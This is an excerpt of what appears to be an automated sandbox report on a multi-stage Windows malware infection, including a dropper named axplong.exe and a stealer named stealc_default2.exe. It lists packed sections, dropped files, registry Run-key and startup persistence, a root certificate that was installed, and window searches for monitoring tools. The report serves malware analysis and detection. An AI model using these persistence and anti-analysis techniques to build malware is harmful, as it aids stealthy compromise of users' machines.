Source: d0d468f327.exe.7.dr	Static PE information: section name: nnxuuolc
Source: d0d468f327.exe.7.dr	Static PE information: section name: fjnjtzun
Source: d0d468f327.exe.7.dr	Static PE information: section name: .taggant
Source: gold[1].exe.7.dr	Static PE information: section name:
Source: gold[1].exe.7.dr	Static PE information: section name:
Source: gold[1].exe.7.dr	Static PE information: section name:
Source: gold[1].exe.7.dr	Static PE information: section name: .themida
Source: gold[1].exe.7.dr	Static PE information: section name: .boot
Source: gold.exe.7.dr	Static PE information: section name:
Source: gold.exe.7.dr	Static PE information: section name:
Source: gold.exe.7.dr	Static PE information: section name:
Source: gold.exe.7.dr	Static PE information: section name: .themida
Source: gold.exe.7.dr	Static PE information: section name: .boot
Source: Offnewhere[1].exe.7.dr	Static PE information: section name: .eh_fram
Source: Offnewhere.exe.7.dr	Static PE information: section name: .eh_fram
Source: myrdx[1].exe.7.dr	Static PE information: section name: .bsp
Source: myrdx[1].exe.7.dr	Static PE information: section name: .bsp
Source: myrdx.exe.7.dr	Static PE information: section name: .bsp
Source: myrdx.exe.7.dr	Static PE information: section name: .bsp
Source: 1[1].exe.7.dr	Static PE information: section name: .eh_fram
Source: 1.exe.7.dr	Static PE information: section name: .eh_fram
Source: random[1].exe1.7.dr	Static PE information: section name:
Source: random[1].exe1.7.dr	Static PE information: section name: .rsrc
Source: random[1].exe1.7.dr	Static PE information: section name: .idata
Source: random[1].exe1.7.dr	Static PE information: section name:
Source: random[1].exe1.7.dr	Static PE information: section name: hbhagroj
Source: random[1].exe1.7.dr	Static PE information: section name: weowoivy
Source: random[1].exe1.7.dr	Static PE information: section name: .taggant
Source: 4ad48d7d65.exe.7.dr	Static PE information: section name:
Source: 4ad48d7d65.exe.7.dr	Static PE information: section name: .rsrc
Source: 4ad48d7d65.exe.7.dr	Static PE information: section name: .idata
Source: 4ad48d7d65.exe.7.dr	Static PE information: section name:
Source: 4ad48d7d65.exe.7.dr	Static PE information: section name: hbhagroj
Source: 4ad48d7d65.exe.7.dr	Static PE information: section name: weowoivy
Source: 4ad48d7d65.exe.7.dr	Static PE information: section name: .taggant
Source: random[1].exe2.7.dr	Static PE information: section name:
Source: random[1].exe2.7.dr	Static PE information: section name: .rsrc
Source: random[1].exe2.7.dr	Static PE information: section name: .idata
Source: random[1].exe2.7.dr	Static PE information: section name: vizvkyid
Source: random[1].exe2.7.dr	Static PE information: section name: ekdkgglk
Source: random[1].exe2.7.dr	Static PE information: section name: .taggant
Source: 25e6c25320.exe.7.dr	Static PE information: section name:
Source: 25e6c25320.exe.7.dr	Static PE information: section name: .rsrc
Source: 25e6c25320.exe.7.dr	Static PE information: section name: .idata
Source: 25e6c25320.exe.7.dr	Static PE information: section name: vizvkyid
Source: 25e6c25320.exe.7.dr	Static PE information: section name: ekdkgglk
Source: 25e6c25320.exe.7.dr	Static PE information: section name: .taggant
Source: 84d15ff2c9.exe.7.dr	Static PE information: section name:
Source: 84d15ff2c9.exe.7.dr	Static PE information: section name: .rsrc
Source: 84d15ff2c9.exe.7.dr	Static PE information: section name: .idata
Source: 84d15ff2c9.exe.7.dr	Static PE information: section name:
Source: 84d15ff2c9.exe.7.dr	Static PE information: section name: hbhagroj
Source: 84d15ff2c9.exe.7.dr	Static PE information: section name: weowoivy
Source: 84d15ff2c9.exe.7.dr	Static PE information: section name: .taggant

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_0027D84C push ecx; ret	7_2_0027D85F
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 8_2_002467D6 push ecx; ret	8_2_002467E9
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 8_2_00296895 push esi; ret	8_2_0029689E
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 8_2_00275AF8 push ecx; ret	8_2_00275B0B
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 8_2_00244EFA push eax; ret	8_2_00244F5A
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 9_2_00244EFA push eax; ret	9_2_00244F5A
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 9_2_002467D6 push ecx; ret	9_2_002467E9
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 10_2_00428E7D push esi; ret	10_2_00428E86
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 10_2_004076E0 push ecx; ret	10_2_004076F3
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_00CBB035 push ecx; ret	14_2_00CBB048
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BADB536 push ecx; ret	14_2_6BADB549

Source: file.exe	Static PE information: section name: entropy: 7.980908097996731
Source: file.exe	Static PE information: section name: iknsbfcc entropy: 7.9525167901551885
Source: axplong.exe.0.dr	Static PE information: section name: entropy: 7.980908097996731
Source: axplong.exe.0.dr	Static PE information: section name: iknsbfcc entropy: 7.9525167901551885
Source: 03564c0e08.exe.7.dr	Static PE information: section name: entropy: 7.978094847939657
Source: random[1].exe.7.dr	Static PE information: section name: .text entropy: 7.82060659626259
Source: 13a34faa3c.exe.7.dr	Static PE information: section name: .text entropy: 7.82060659626259
Source: random[1].exe0.7.dr	Static PE information: section name: entropy: 7.981612404395276
Source: d0d468f327.exe.7.dr	Static PE information: section name: entropy: 7.981612404395276
Source: gold[1].exe.7.dr	Static PE information: section name: entropy: 7.99690303513096
Source: gold.exe.7.dr	Static PE information: section name: entropy: 7.99690303513096
Source: random[1].exe1.7.dr	Static PE information: section name: hbhagroj entropy: 7.952611357420467
Source: 4ad48d7d65.exe.7.dr	Static PE information: section name: hbhagroj entropy: 7.952611357420467
Source: random[1].exe2.7.dr	Static PE information: section name: entropy: 7.978094847939657
Source: 25e6c25320.exe.7.dr	Static PE information: section name: entropy: 7.978094847939657
Source: 84d15ff2c9.exe.7.dr	Static PE information: section name: hbhagroj entropy: 7.952611357420467

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	File created: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr			Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif			Jump to dropped file

Installs new ROOT certificates

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\splwow64[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000877001\25e6c25320.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000474001\gold.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\myrdx[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000802001\1.exe	File created: C:\Users\user\AppData\Local\Temp\jwDqhXNxeUGDiYzIXhpX.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\zxcv[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	File created: C:\Users\user\AppData\Roaming\ofHIebp8us.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000879001\03564c0e08.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\stealc_default2[1].exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	File created: C:\ProgramData\LgAmARwZ\Application.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000569001\myrdx.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	File created: C:\Users\user\AppData\Local\Temp\WGTxLaJUJMXdPsRkrFVC.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000876001\4ad48d7d65.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Offnewhere[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\gold[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000878001\84d15ff2c9.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File created: C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	File created: C:\Users\user\AppData\Local\Temp\service123.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	File created: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	File created: C:\Users\user\AppData\Roaming\Cd0bGrjt9g.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\1[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000802001\1.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	File created: C:\ProgramData\LgAmARwZ\Application.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 03564c0e08.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 25e6c25320.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4ad48d7d65.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 84d15ff2c9.exe	Jump to behavior

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000474001\gold.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1000474001\gold.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000474001\gold.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000876001\4ad48d7d65.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000876001\4ad48d7d65.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000876001\4ad48d7d65.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1000876001\4ad48d7d65.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000876001\4ad48d7d65.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000876001\4ad48d7d65.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1000876001\4ad48d7d65.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1000876001\4ad48d7d65.exe	Window searched: window name: PROCMON_WINDOW_CLASS

Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LgAmARwZ.url

Source: C:\Users\user\Desktop\file.exe

File created: C:\Windows\Tasks\axplong.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LgAmARwZ.url

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4ad48d7d65.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4ad48d7d65.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 25e6c25320.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 25e6c25320.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 84d15ff2c9.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 84d15ff2c9.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 03564c0e08.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 03564c0e08.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

14_2_00CB9860

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
